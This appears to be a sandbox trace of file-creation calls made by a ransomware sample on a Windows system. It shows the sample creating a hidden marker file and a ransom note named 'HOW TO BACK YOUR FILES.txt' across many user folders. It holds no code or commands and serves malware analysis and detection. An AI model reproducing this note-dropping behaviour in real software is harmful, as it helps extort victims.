Create C:\Users\FD1HVy\Start Menu\Programs\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Users\FD1HVy\Start Menu\Programs\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Start Menu\Programs\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\FD1HVy\Start Menu\Programs\Windows PowerShell\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Users\FD1HVy\Start Menu\Programs\Windows PowerShell\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Start Menu\Programs\Windows PowerShell\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\FD1HVy\Start Menu\Programs\System Tools\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Users\FD1HVy\Start Menu\Programs\System Tools\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Start Menu\Programs\System Tools\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\FD1HVy\Start Menu\Programs\Startup\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Users\FD1HVy\Start Menu\Programs\Startup\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Start Menu\Programs\Startup\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\FD1HVy\Start Menu\Programs\Maintenance\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Users\FD1HVy\Start Menu\Programs\Maintenance\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Start Menu\Programs\Maintenance\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\FD1HVy\Start Menu\Programs\Administrative Tools\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Users\FD1HVy\Start Menu\Programs\Administrative Tools\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Start Menu\Programs\Administrative Tools\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\FD1HVy\Start Menu\Programs\Accessories\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Users\FD1HVy\Start Menu\Programs\Accessories\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\IconCache.db desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\VirtualStore\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\VirtualStore\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\UNP\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\UNP\.{91be532c-f9f1-406a-9858-43697c6f437a}_uxlock desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\UNP\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\TileDataLayer\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Start Menu\Programs\Accessories\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\TileDataLayer\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\TileDataLayer\Database\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\TileDataLayer\Database\EDB.chk desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\TileDataLayer\Database\EDB.log desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Users\FD1HVy\Desktop\ids.txt desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH, share_mode = FILE_SHARE_READ True 4
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\TileDataLayer\Database\EDB00005.log desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Start Menu\Programs\Accessibility\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Users\FD1HVy\Start Menu\Programs\Accessibility\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Start Menu\Programs\Accessibility\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\FD1HVy\SendTo\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Users\FD1HVy\SendTo\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\SendTo\Documents.mydocs desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\SendTo\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\FD1HVy\Searches\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Users\FD1HVy\Searches\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Searches\Everywhere.search-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Searches\Indexed Locations.search-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Searches\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\FD1HVy\Saved Games\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Users\FD1HVy\Saved Games\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Saved Games\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\FD1HVy\Recent\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Users\FD1HVy\Recent\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\TileDataLayer\Database\EDBres00001.jrs desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Recent\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\FD1HVy\Recent\CustomDestinations\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Users\FD1HVy\Recent\CustomDestinations\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Recent\CustomDestinations\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\FD1HVy\Recent\AutomaticDestinations\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Users\FD1HVy\Recent\AutomaticDestinations\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Recent\AutomaticDestinations\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\FD1HVy\PrintHood\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Users\FD1HVy\PrintHood\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\PrintHood\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\FD1HVy\Pictures\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Users\FD1HVy\Pictures\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Pictures\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\FD1HVy\Pictures\Saved Pictures\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Users\FD1HVy\Pictures\Saved Pictures\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Pictures\Saved Pictures\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\FD1HVy\Pictures\Camera Roll\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Users\FD1HVy\Pictures\Camera Roll\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Pictures\Camera Roll\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\FD1HVy\OneDrive\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Users\FD1HVy\OneDrive\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\OneDrive\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\FD1HVy\NetHood\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Users\FD1HVy\NetHood\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\NetHood\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\FD1HVy\My Documents\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Users\FD1HVy\My Documents\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\TileDataLayer\Database\EDBres00002.jrs desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\My Documents\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\FD1HVy\My Documents\Outlook Files\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Users\FD1HVy\My Documents\Outlook Files\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\My Documents\Outlook Files\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\FD1HVy\My Documents\My Videos\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Users\FD1HVy\My Documents\My Videos\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\My Documents\My Videos\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\FD1HVy\My Documents\My Videos\9ons\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
